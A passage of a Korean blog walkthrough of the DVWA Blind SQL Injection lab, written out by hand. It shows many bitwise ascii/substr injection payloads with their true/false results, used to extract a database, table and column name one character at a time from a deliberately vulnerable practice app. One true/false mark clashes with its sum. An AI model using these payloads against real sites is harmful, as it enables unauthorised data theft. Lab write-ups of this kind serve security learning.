Archive for Dev. (junyup2)

์ง€์‹์„ ์ฑ„์›Œ๊ฐ€๋Š” ใ€Ž๊ฐœ๋ฐœ์ž/ํ™”์ดํŠธํ•ด์ปคใ€๋ฅผ ๋ชฉํ‘œ๋กœ ์ •๋ฆฌํ•˜๋Š” ๋ธ”๋กœ๊ทธ

Practice/DVWA

[DVWA] SQL Injection (Blind ์ˆ˜๋™ ์ ๊ฒ€)

Gearvirus(junyup2) 2024. 4. 12. 23:29

Vulnerability: SQL Injection (Blind)

Blind SQL Injection์„ ์ด์šฉํ•˜์—ฌ DB ๋‚ด๋ถ€์˜ ๋ฐ์ดํ„ฐ๋ฅผ ์กฐํšŒํ•˜๋Š” ๊ฒƒ์„ ๋ชฉ์ ์œผ๋กœ ํ•œ๋‹ค. ํ•ด๋‹น ์‹ค์Šต ๋ฌธ์ œ์˜ ๊ฒฝ์šฐ ID๋ฅผ ์ž…๋ ฅํ–ˆ์„ ๋•Œ ์œ ํšจํ•œ ID(์กด์žฌํ•˜๋Š” ID)์ธ์ง€ ์•„๋‹Œ์ง€(์˜ฌ๋ฐ”๋ฅด์ง€ ์•Š์€/์กด์žฌํ•˜์ง€ ์•Š๋Š” ID)๋ฅผ ํŒ๋ณ„ํ•ด์ฃผ๋Š” ์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์ด๋‹ค.

์œ ํšจํ•œ  ID๋ฅผ ์ž…๋ ฅํ•˜๋Š” ๊ฒฝ์šฐ (์ž…๋ ฅํ•œ ๊ฐ’์ด ์ฐธ์ธ ๊ฒฝ์šฐ)์—๋Š” "User ID exists in the database." ๋ผ๋Š” ๊ฒฐ๊ณผ ๊ฐ’์„ ์–ป์„ ์ˆ˜ ์žˆ๊ณ , ์œ ํšจํ•˜์ง€ ์•Š์€ ID๋ฅผ ์ž…๋ ฅํ•˜๋Š” ๊ฒฝ์šฐ (์ž…๋ ฅํ•œ ๊ฐ’์ด ๊ฑฐ์ง“์ธ ๊ฒฝ์šฐ)์—๋Š” "User ID is MISSING from the database." ๋ผ๋Š” ๊ฒฐ๊ณผ ๊ฐ’์„ ์–ป๊ฒŒ ๋œ๋‹ค.

๋ณธ ์‹ค์Šต์—์„œ๋Š” nmap /sqlmap๊ณผ ๊ฐ™์€ ํƒ์ง€ ํ”„๋กœ๊ทธ๋žจ(์ž๋™ํ™” ํˆด)์„ ์‚ฌ์šฉํ•˜์ง€ ์•Š๊ณ  ์ˆ˜๋™ ์ ๊ฒ€ํ•˜๋Š” ๋ฐฉ๋ฒ•๋งŒ ์‹œ๋„ํ•  ๊ฒƒ์ด๋‹ค.

(์ž๋™ํ™” ํˆด์„ ์ด์šฉํ•˜๊ฑฐ๋‚˜ python์„ ์ด์šฉํ•œ ์ž๋™ํ™” ๋ฐฉ๋ฒ•์€ ์ถ”ํ›„์— ์ •๋ฆฌํ•ด๋ณด๋ ค ํ•œ๋‹ค.)

 

Vuln Point

์ฐธ์ธ ๊ฐ’ (1=1)
1' and 1=1 #
-> User ID exists in the database.

๊ฑฐ์ง“์ธ ๊ฐ’(1=2)
1' and 1=2 # 
-> User ID is MISSING from the database.

and ์—ฐ์‚ฐ์„ ์ด์šฉํ•˜์—ฌ ์ฐธ์ธ ๊ฐ’๊ณผ ๊ฑฐ์ง“์ธ ๊ฐ’์— ๋Œ€ํ•œ ๊ฒฐ๊ณผ ๊ฐ’์ด ๋‹ค๋ฅด๊ฒŒ ๋‚˜์˜ค๋Š” ๊ฒƒ์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค. ์ด๊ฒƒ์„ ํ†ตํ•ด SQL Injection ์ทจ์•ฝ์ ์ด ์กด์žฌํ•œ๋‹ค๊ณ  ์˜์‹ฌํ•ด๋ณผ ์ˆ˜ ์žˆ๋‹ค.

 

True/False

์ฐธ(True)์ธ ๊ฐ’๊ณผ ๊ฑฐ์ง“(False)์ธ ๊ฐ’์— ๋Œ€ํ•œ ์ฐจ์ด๋ฅผ ํ†ตํ•ด Blind SQL Injection์„ ์ด์šฉํ•  ์ˆ˜ ์žˆ๊ฒŒ ๋œ๋‹ค.

๋ณธ ์‹ค์Šต ๋ฌธ์ œ์˜ ๊ฒฝ์šฐ ID ์ž…๋ ฅ์— ๋”ฐ๋ฅธ ์œ ํšจํ•œ ID ์—ฌ๋ถ€๋ฅผ ํŒ๋‹จํ•˜๊ณ  ์žˆ๋‹ค. DB์˜ ๋‚ด์šฉ์„ ์ง์ ‘์ ์œผ๋กœ ์œ ์ถœ(์ถœ๋ ฅ)ํ•˜๊ณ  ์žˆ์ง€๋Š” ์•Š๊ณ , ๋‹จ์ง€ ์˜ณ๋‹ค(True), ํ‹€๋ฆฌ๋‹ค(False)๋ผ๋Š” ๋ฐ˜์‘๋งŒ ๋‚ด๋ณด๋‚ธ๋‹ค๋Š” ๊ฒƒ์ด๋‹ค. ํ•˜์ง€๋งŒ ์ฐธ์ธ ๊ฐ’๊ณผ, ๊ฑฐ์ง“์ธ ๊ฐ’์˜ ์ฐจ์ด๊ฐ€ ์กด์žฌํ•˜๋ฏ€๋กœ์„œ ์งˆ์˜์— ๋Œ€ํ•œ ์‘๋‹ต ์ฐจ์ด๋ฅผ ํ†ตํ•ด Blind SQLi๋ฅผ ์‹ค์‹œํ•  ์ˆ˜ ์žˆ๋‹ค.

and ์—ฐ์‚ฐ์˜ ํŠน์ง•์„ ์ด์šฉํ•˜์—ฌ ์ฐธ and ์ฐธ / ์ฐธ and ๊ฑฐ์ง“์˜ ๊ฐ’์ด ๊ฐ๊ฐ ์ฐธ/๊ฑฐ์ง“์ธ ๊ฒƒ์„ ์ด์šฉํ•œ๋‹ค.

ํ•ญ์ƒ ์ฐธ(1=1) / ํ•ญ์ƒ ๊ฑฐ์ง“(1=2) ์ธ ๊ฐ’์„ and ๋ฅผ ์ด์šฉํ•˜์—ฌ ๋ฌถ์–ด์ฃผ์–ด WHERE ๋ฌธ์ด ์ฐธ์ธ ๊ฒฝ์šฐ ์กฐํšŒ์— ์„ฑ๊ณตํ•˜๊ณ , WHERE ๋ฌธ์ด ๊ฑฐ์ง“์ธ ๊ฒฝ์šฐ ์กฐํšŒ์— ์‹คํŒจํ•˜๋„๋กํ•˜๋Š” ๊ฒƒ์ด๋‹ค.

True and True = True
SELECT * FROM users WHERE user_id='1' and 1=1 #';
                                                           (True)

True and False = False
SELECT * FROM users WHERE user_id='1' and 1=2 #';
                                                         (False)

 

DVWA Blind SQL Injection ์‹ค์Šต

์‹ค์Šต ํ™˜๊ฒฝ
- Windows Docker๋ฅผ ์ด์šฉํ•œ DVWA
- Windows ํ™˜๊ฒฝ์˜ Burp Suite

Blind SQL Injection์˜ ๊ฒฝ์šฐ, ํ•œ ์ค„์˜ ์ถœ๋ ฅ์— ๋Œ€ํ•œ ํ•œ ๊ธ€์ž์”ฉ๋งŒ ํ™•์ธ์ด ๊ฐ€๋Šฅํ•˜๋‹ค. ๊ทธ๋Ÿฌ๋ฏ€๋กœ LIMIT๋ฅผ ์ด์šฉํ•ด์•ผ ํ•œ๋‹ค.

 

Security Level: Low

LOW ๋ ˆ๋ฒจ์˜ ๊ฒฝ์šฐ ์ž…๋ ฅ ๊ฐ’์— ๋Œ€ํ•œ ์ œํ•œ์ด ๋”ฑํžˆ ์—†๋‹ค. DB์ด๋ฆ„ / ์›ํ•˜๋Š” ํ…Œ์ด๋ธ” / ์›ํ•˜๋Š” ์ปฌ๋Ÿผ / ์›ํ•˜๋Š” ๋ฐ์ดํ„ฐ ๋ฅผ ๊ฐ๊ฐ ํ•œ ๊ฐœ์”ฉ๋งŒ ๋ฝ‘์•„๋ณผ ๊ฒƒ์ด๋‹ค.

Blind SQL Injection์˜ Process์— ๋”ฐ๋ผ ์ง„ํ–‰ํ•œ๋‹ค. ์šฐ์„  ์ฐธ/๊ฑฐ์ง“์— ๋Œ€ํ•œ ์‘๋‹ต์„ ํ™•์ธํ•ด๋ณธ๋‹ค.

 

True / False

์ฐธ(True)์ธ ๊ฐ’: 1' and 1=1 #

๊ฑฐ์ง“(False)์ธ ๊ฐ’: 1' and 1=2 #

 

๊ณต๊ฒฉ ์ฟผ๋ฆฌ(Query)

์šฐ์„  ๊ณต๊ฒฉ ์ฟผ๋ฆฌ๋ฅผ ์ž‘์„ฑํ•˜๊ณ  SQL ๊ตฌ๋ฌธ์ด ๋“ค์–ด๊ฐˆ ์ž๋ฆฌ์— ์›ํ•˜๋Š” SQL ๊ตฌ๋ฌธ์„ ์‚ฝ์ž…ํ•˜๋„๋ก ํ•œ๋‹ค.

Blind SQLi ์˜ ๊ฒฝ์šฐ substr ํ•จ์ˆ˜๋ฅผ ์ด์šฉํ•˜์—ฌ ์›ํ•˜๋Š” ๊ธ€์ž ๋ถ€๋ถ„์„ ์ž˜๋ผ๋‚ด๊ณ , ํ•ด๋‹น ๊ฐ’์„ ascii ์ฝ”๋“œ๋กœ ๋ณ€ํ™˜ํ•˜์—ฌ ์ด์ง„ํƒ์ƒ‰์„ ์ง„ํ–‰ํ•œ๋‹ค. ์—ฌ๊ธฐ์„œ๋Š” ๋ถ€๋“ฑํ˜ธ(>,<) ๋ฅผ ์ด์šฉํ•˜์ง€ ์•Š๊ณ  ๋…ผ๋ฆฌ์—ฐ์‚ฐ(์ด์ง„์ฝ”๋“œ)์„ ์ด์šฉํ•˜๋ ค ํ•œ๋‹ค. 1, 2, 4, 8, 16, 32, 64์˜ ๊ฐ’๊ณผ ๋…ผ๋ฆฌ์—ฐ์‚ฐ์„ ์ง„ํ–‰ํ•˜์—ฌ ํ•ด๋‹น ๊ฐ’์ด ์ฐธ์ธ์ง€ ๊ฑฐ์ง“์ธ์ง€ ํ™•์ธํ•˜์—ฌ ์ฐธ์ธ ๊ฐ’์˜ ํ•ฉ์ด ํ•ด๋‹นํ•˜๋Š” ascii์ฝ”๋“œ ๊ฐ’์ด ๋œ๋‹ค.

ํ•œ ๊ธ€์ž์˜ ๊ฐ’์„ ํ™•์ธํ•˜๊ธฐ ์œ„ํ•œ 'ํ•œ ์„ธํŠธ'
1' and ascii(substr((select __SQL__),1,1))&1=1#
1' and ascii(substr((select __SQL__),1,1))&2=2#
1' and ascii(substr((select __SQL__),1,1))&4=4#
1' and ascii(substr((select __SQL__),1,1))&8=8#
1' and ascii(substr((select __SQL__),1,1))&16=16#
1' and ascii(substr((select __SQL__),1,1))&32=32#
1' and ascii(substr((select __SQL__),1,1))&64=64#

 

DB ์ด๋ฆ„ ํ™•์ธํ•˜๊ธฐ

select database()

DB์˜ ์ด๋ฆ„์„ ํ•œ๊ธ€์ž์”ฉ ํ™•์ธํ•ด๋ณด๋ฉด ๋‹ค์Œ๊ณผ ๊ฐ™๋‹ค.

1' and ascii(substr((select database()),1,1))&1=1# (๊ฑฐ์ง“)
1' and ascii(substr((select database()),1,1))&2=2# (๊ฑฐ์ง“)
1' and ascii(substr((select database()),1,1))&4=4# (์ฐธ)
1' and ascii(substr((select database()),1,1))&8=8# (๊ฑฐ์ง“)
1' and ascii(substr((select database()),1,1))&16=16# (๊ฑฐ์ง“)
1' and ascii(substr((select database()),1,1))&32=32# (์ฐธ)
1' and ascii(substr((select database()),1,1))&64=64# (์ฐธ)
4, 32, 64 -> 100 -> d

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 100์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ d๊ฐ€ ๋œ๋‹ค.

1' and ascii(substr((select database()),2,1))&1=1# (๊ฑฐ์ง“)
1' and ascii(substr((select database()),2,1))&2=2# (์ฐธ)
1' and ascii(substr((select database()),2,1))&4=4# (์ฐธ)
1' and ascii(substr((select database()),2,1))&8=8# (๊ฑฐ์ง“)
1' and ascii(substr((select database()),2,1))&16=16# (์ฐธ)
1' and ascii(substr((select database()),2,1))&32=32# (์ฐธ)
1' and ascii(substr((select database()),2,1))&64=64# (์ฐธ)
2, 4, 16, 32, 64 -> 118 -> v

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 118์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ v๊ฐ€ ๋œ๋‹ค.

1' and ascii(substr((select database()),3,1))&1=1# (์ฐธ)
1' and ascii(substr((select database()),3,1))&2=2# (์ฐธ)
1' and ascii(substr((select database()),3,1))&4=4# (์ฐธ)
1' and ascii(substr((select database()),3,1))&8=8# (๊ฑฐ์ง“)
1' and ascii(substr((select database()),3,1))&16=16# (์ฐธ)
1' and ascii(substr((select database()),3,1))&32=32# (์ฐธ)
1' and ascii(substr((select database()),3,1))&64=64# (์ฐธ)
1, 2, 4, 16, 32, 64 -> 119 -> w

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 119์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ w๊ฐ€ ๋œ๋‹ค.

1' and ascii(substr((select database()),4,1))&1=1# (์ฐธ)
1' and ascii(substr((select database()),4,1))&2=2# (๊ฑฐ์ง“)
1' and ascii(substr((select database()),4,1))&4=4# (๊ฑฐ์ง“)
1' and ascii(substr((select database()),4,1))&8=8# (๊ฑฐ์ง“)
1' and ascii(substr((select database()),4,1))&16=16# (๊ฑฐ์ง“)
1' and ascii(substr((select database()),4,1))&32=32# (์ฐธ)
1' and ascii(substr((select database()),4,1))&64=64# (์ฐธ)
1, 32, 64 -> 97 -> a

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 97์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ a๊ฐ€ ๋œ๋‹ค.

์œ„์˜ ๊ฐ ๊ธ€์ž๋ฅผ ์กฐํ•ฉํ•˜๋ฉด DB์ด๋ฆ„์€ dvwa์ธ ๊ฒƒ์„ ์•Œ ์ˆ˜ ์žˆ๋‹ค.

 

TABLE ์ด๋ฆ„ ํ™•์ธํ•˜๊ธฐ

์›ํ•˜๋Š” ํ…Œ์ด๋ธ”์˜ ์œ„์น˜๋ฅผ ์ด๋ฏธ ์•Œ๊ณ ์„œ ์ง„ํ–‰ํ•œ๋‹ค.(2๋ฒˆ์งธ์— ์กด์žฌํ•˜๋Š” ํ…Œ์ด๋ธ”์„ ์กฐํšŒํ•  ๊ฒƒ์ด๋‹ค.)

select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1

ํ•ด๋‹น Table์˜ ์ด๋ฆ„์„ ํ•œ๊ธ€์ž์”ฉ ํ™•์ธํ•ด ๋ณด๋ฉด ๋‹ค์Œ๊ณผ ๊ฐ™๋‹ค.

1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&1=1# (์ฐธ)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&2=2# (๊ฑฐ์ง“)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&4=4# (์ฐธ)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&8=8# (๊ฑฐ์ง“)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&16=16# (์ฐธ)
' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&32=32# (์ฐธ)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&64=64# (์ฐธ)
1, 4, 16, 32, 64 -> 117 -> u

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 117์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ u๊ฐ€ ๋œ๋‹ค.

1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),2,1))&1=1# (์ฐธ)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),2,1))&2=2# (์ฐธ)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),2,1))&4=4# (๊ฑฐ์ง“)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),2,1))&8=8# (๊ฑฐ์ง“)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),2,1))&16=16# (์ฐธ)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),2,1))&32=32# (์ฐธ)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),2,1))&64=64# (์ฐธ)
1, 2, 16, 32, 64 -> 115 -> s

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 115์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ s๊ฐ€ ๋œ๋‹ค.

1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),3,1))&1=1# (์ฐธ)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),3,1))&2=2# (๊ฑฐ์ง“)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),3,1))&4=4# (์ฐธ)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),3,1))&8=8# (๊ฑฐ์ง“)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),3,1))&16=16# (๊ฑฐ์ง“)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),3,1))&32=32# (์ฐธ)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),3,1))&64=64# (์ฐธ)
1, 4, 32, 64 -> 101 -> e

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 101์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ e๊ฐ€ ๋œ๋‹ค.

1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),4,1))&1=1# (๊ฑฐ์ง“)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),4,1))&2=2# (์ฐธ)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),4,1))&4=4# (๊ฑฐ์ง“)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),4,1))&8=8# (๊ฑฐ์ง“)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),4,1))&16=16# (์ฐธ)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),4,1))&32=32# (์ฐธ)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),4,1))&64=64# (๊ฑฐ์ง“)
2, 16, 32, 64 -> 114 -> r

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 114์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ r์ด ๋œ๋‹ค.

1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),5,1))&1=1# (์ฐธ)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),5,1))&2=2# (์ฐธ)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),5,1))&4=4# (๊ฑฐ์ง“)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),5,1))&8=8# (๊ฑฐ์ง“)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),5,1))&16=16# (์ฐธ)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),5,1))&32=32# (์ฐธ)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),5,1))&64=64# (์ฐธ)
1, 2, 16, 32, 64 -> 115 -> s

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 115์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ s๊ฐ€ ๋œ๋‹ค.

์œ„์˜ ๊ฐ ๊ธ€์ž๋ฅผ ์กฐํ•ฉํ•˜๋ฉด ํ•ด๋‹น Table ์ด๋ฆ„์€ users์ธ ๊ฒƒ์„ ์•Œ ์ˆ˜ ์žˆ๋‹ค.

 

COLUMN ์ด๋ฆ„ ํ™•์ธํ•˜๊ธฐ

์›ํ•˜๋Š” ์ปฌ๋Ÿผ์˜ ์œ„์น˜๋ฅผ ์ด๋ฏธ ์•Œ๊ณ ์„œ ์ง„ํ–‰ํ•œ๋‹ค.(users ํ…Œ์ด๋ธ”์˜ 5๋ฒˆ์งธ์— ์กด์žฌํ•˜๋Š” ์ปฌ๋Ÿผ์„ ์กฐํšŒํ•  ๊ฒƒ์ด๋‹ค.)

select column_name from information_schema.columns where table_name = 'users' limit 4,1

ํ•ด๋‹น Column์˜ ์ด๋ฆ„์„ ํ•œ๊ธ€์ž์”ฉ ํ™•์ธํ•ด ๋ณด๋ฉด ๋‹ค์Œ๊ณผ ๊ฐ™๋‹ค.

1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&1=1# (๊ฑฐ์ง“)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&2=2# (๊ฑฐ์ง“)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&4=4# (๊ฑฐ์ง“)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&8=8# (๊ฑฐ์ง“)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&16=16# (์ฐธ)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&32=32# (์ฐธ)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&64=64# (์ฐธ)
16, 32, 64 -> 112 -> p

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 112์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ p๊ฐ€ ๋œ๋‹ค.

1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),2,1))&1=1# (์ฐธ)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),2,1))&2=2# (๊ฑฐ์ง“)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),2,1))&4=4# (๊ฑฐ์ง“)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),2,1))&8=8# (๊ฑฐ์ง“)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),2,1))&16=16# (๊ฑฐ์ง“)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),2,1))&32=32# (์ฐธ)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),2,1))&64=64# (์ฐธ)
1, 32, 64 -> 97 -> a

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 97์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ a๊ฐ€ ๋œ๋‹ค.

1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),3,1))&1=1# (์ฐธ)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),3,1))&2=2# (์ฐธ)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),3,1))&4=4# (๊ฑฐ์ง“)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),3,1))&8=8# (๊ฑฐ์ง“)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),3,1))&16=16# (์ฐธ)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),3,1))&32=32# (์ฐธ)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),3,1))&64=64# (์ฐธ)
1, 2, 16, 32, 64 -> 115 -> s

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 115์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ s๊ฐ€ ๋œ๋‹ค.

1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),4,1))&1=1# (์ฐธ)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),4,1))&2=2# (์ฐธ)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),4,1))&4=4# (๊ฑฐ์ง“)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),4,1))&8=8# (๊ฑฐ์ง“)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),4,1))&16=16# (์ฐธ)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),4,1))&32=32# (์ฐธ)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),4,1))&64=64# (์ฐธ)
1, 2, 16, 32, 64 -> 115 -> s

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 115์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ s๊ฐ€ ๋œ๋‹ค.

1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),5,1))&1=1# (์ฐธ)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),5,1))&2=2# (์ฐธ)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),5,1))&4=4# (์ฐธ)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),5,1))&8=8# (๊ฑฐ์ง“)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),5,1))&16=16# (์ฐธ)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),5,1))&32=32# (์ฐธ)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),5,1))&64=64# (์ฐธ)
1, 2, 4, 16 ,32 ,64 -> 119 -> w

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 119์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ w๊ฐ€ ๋œ๋‹ค.

1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),6,1))&1=1# (์ฐธ)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),6,1))&2=2# (์ฐธ)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),6,1))&4=4# (์ฐธ)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),6,1))&8=8# (์ฐธ)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),6,1))&16=16# (๊ฑฐ์ง“)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),6,1))&32=32# (์ฐธ)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),6,1))&64=64# (์ฐธ)
1, 2, 4, 8, 32, 64 -> 111 -> o

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 111์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ o๊ฐ€ ๋œ๋‹ค.

1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),7,1))&1=1# (๊ฑฐ์ง“)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),7,1))&2=2# (์ฐธ)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),7,1))&4=4# (๊ฑฐ์ง“)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),7,1))&8=8# (๊ฑฐ์ง“)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),7,1))&16=16# (์ฐธ)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),7,1))&32=32# (์ฐธ)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),7,1))&64=64# (์ฐธ)
2, 16, 32, 64 -> 114 -> r

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 114์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ r์ด ๋œ๋‹ค.

1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),8,1))&1=1# (๊ฑฐ์ง“)
